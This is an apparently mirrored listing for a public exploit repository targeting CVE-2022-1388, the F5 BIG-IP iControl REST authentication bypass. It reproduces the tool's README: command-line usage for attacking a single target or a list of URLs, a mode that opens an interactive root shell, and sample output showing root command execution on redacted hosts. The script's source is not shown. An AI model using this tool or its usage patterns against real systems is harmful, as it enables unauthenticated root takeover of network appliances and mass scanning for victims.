CVE-2022-1388 PoC — F5 BIG-IP 访问控制错误漏洞

Source

https://github.com/Luchoane/CVE-2022-1388_refresh

Associated Vulnerability

Title:F5 BIG-IP 访问控制错误漏洞 (CVE-2022-1388)
Description:On F5 BIG-IP 16.1.x versions prior to 16.1.2.2, 15.1.x versions prior to 15.1.5.1, 14.1.x versions prior to 14.1.4.6, 13.1.x versions prior to 13.1.5, and all 12.1.x and 11.6.x versions, undisclosed requests may bypass iControl REST authentication. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated

Description

PoC for exploiting CVE-2022-1388 on BIG IP F5

Readme

# CVE-2022-1388 - refresh

PoC for exploiting CVE-2022-1388 on BigIP F5

### Exploit Usage

```
python3 refresh.py -h
usage: refresh.py [-h] [-u URL] [-f F] [-c CMD] [-s SH]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     target url
  -f F, --file F        url file
  -c CMD, --command CMD
                        command
  -s SH, --shell SH     url to connect
  ```
  

#### Exploit single target:
```
$ python3 refresh.py -u IP -c id

      ::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: :::    :::
     :+:    :+::+:       :+:       :+:    :+::+:      :+:    :+::+:    :+:
    +:+    +:++:+       +:+       +:+    +:++:+      +:+       +:+    +:+
   +#++:++#: +#++:++#  :#::+::#  +#++:++#: +#++:++# +#++:++#+++#++:++#++
  +#+    +#++#+       +#+       +#+    +#++#+             +#++#+    +#+
 #+#    #+##+#       #+#       #+#    #+##+#      #+#    #+##+#    #+#
###    ################       ###    ##################### ###    ###

                       </coded by Luchoane>

[++++++] VULNERABLE: xxx.xxx.xxx.xxx | uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0
```



#### Exploit url list
```
$ python3 refresh.py -f list.txt -c id

      ::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: :::    :::
     :+:    :+::+:       :+:       :+:    :+::+:      :+:    :+::+:    :+:
    +:+    +:++:+       +:+       +:+    +:++:+      +:+       +:+    +:+
   +#++:++#: +#++:++#  :#::+::#  +#++:++#: +#++:++# +#++:++#+++#++:++#++
  +#+    +#++#+       +#+       +#+    +#++#+             +#++#+    +#+
 #+#    #+##+#       #+#       #+#    #+##+#      #+#    #+##+#    #+#
###    ################       ###    ##################### ###    ###

                       </coded by Luchoane>

[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx
[++++++] VULNERABLE: xxx.xxx.xxx.xxx | uid=0(root) gid=0(root) context=system_u:system_r:init_t
[-] NOT VULNERABLE: xxx.xxx.xxx.xxx

--------------------------
Vulnerable targets scanned:
[+] xxx.xxx.xxx.xxx
```



#### Interactive shell
```
$ python3 refresh.py -s xxx.xxx.xxx.xxx

      ::::::::: ::::::::::::::::::::::::::::: :::::::::::::::::: :::    :::
     :+:    :+::+:       :+:       :+:    :+::+:      :+:    :+::+:    :+:
    +:+    +:++:+       +:+       +:+    +:++:+      +:+       +:+    +:+
   +#++:++#: +#++:++#  :#::+::#  +#++:++#: +#++:++# +#++:++#+++#++:++#++
  +#+    +#++#+       +#+       +#+    +#++#+             +#++#+    +#+
 #+#    #+##+#       #+#       #+#    #+##+#      #+#    #+##+#    #+#
###    ################       ###    ##################### ###    ###

                       </coded by Luchoane>

Welcome to the interactive shell for: xxx.xxx.xxx.xxx
User: root

> ping -c 1 127.0.0.1
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.027 ms

--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.027/0.027/0.027/0.000 ms

>
```

File Snapshot


 [4.0K]  /data/pocs/4604009769fd5e61c92c6a803ea89d692b246101
├── [3.0K]  README.md
└── [5.7K]  refresh.py

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!